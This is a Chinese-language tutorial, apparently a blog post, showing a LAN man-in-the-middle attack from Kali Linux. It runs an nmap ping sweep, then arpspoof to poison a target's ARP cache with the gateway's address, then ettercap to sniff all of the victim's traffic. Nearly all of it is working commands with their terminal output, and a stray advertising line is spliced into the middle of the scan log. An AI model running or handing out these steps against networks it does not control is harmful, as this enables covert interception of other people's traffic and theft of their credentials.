使用nmap 工具在局域网里进行侦探,查看局域网里ip存活数量
root@kali:~# nmap -sP 192.168.1.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 20:59 EST
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.0026s latency).
MAC Address: EC:82:63:85:01:E0 (Unknown)
Nmap scan report for tl-wdr6300 (192.168.1.2)
Host is up (0.0039s latency).
MAC Address: BC:46:99:71:F2:E2 (Tp-link Technologies)
Nmap scan report for 192.168.1.3 (192.168.1.3)
自由互联热门推荐:PDF电子发票识别软件,一键识别电子发票并导入到Excel中!10大顶级数据挖掘软件!人工智能的十大作用!Host is up (0.00016s latency).
MAC Address: B0:35:9F:09:70:8B (Intel Corporate)
Nmap scan report for hao-pc (192.168.1.6)
Host is up (0.00056s latency).
MAC Address: 00:0C:29:B8:63:5A (VMware)
Nmap scan report for 192.168.1.200 (192.168.1.200)
Host is up (0.00030s latency).
MAC Address: 00:0C:29:1C:FD:85 (VMware)
Nmap scan report for kali (192.168.1.5)
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 2.00 seconds
扫描端口:
Nmap 192.168.1.6
进行arp欺骗:
在进行arp欺骗之前需要开启ip转发,没有ip转发目标机器就会无法上网。
root@kali:~# cat /proc/sys/net/ipv
ipv4/ ipv6/
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
root@kali:~#
进行arp欺骗
root@kali:~# arpspoof -i
eth0 lo
root@kali:~# arpspoof -i eth0 192.168.1.6 192.168.1.1
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
root@kali:~# arpspoof -i eth0 -t 192.168.1.6 192.168.1.1
0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32
0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32
0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32
0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32
0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32
0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32
0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32
0:c:29:c5:32:32 0:c:29:b8:63:5a、
获取靶机信息
root@kali:~# ettercap -Tq -i eth0
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
eth0 -> 00:0C:29:C5:32:32
192.168.1.5/255.255.255.0
fe80::20c:29ff:fec5:3232/64
SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 65534 EGID 65534…
33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
* |==================================================>| 100.00 %
6 hosts added to the hosts list…
Starting Unified sniffing…
Text only Interface activated…
Hit ‘h’ for inline help
随着靶机查看信息得到反馈
获取到的信息是所有的数据流量(就是有点多)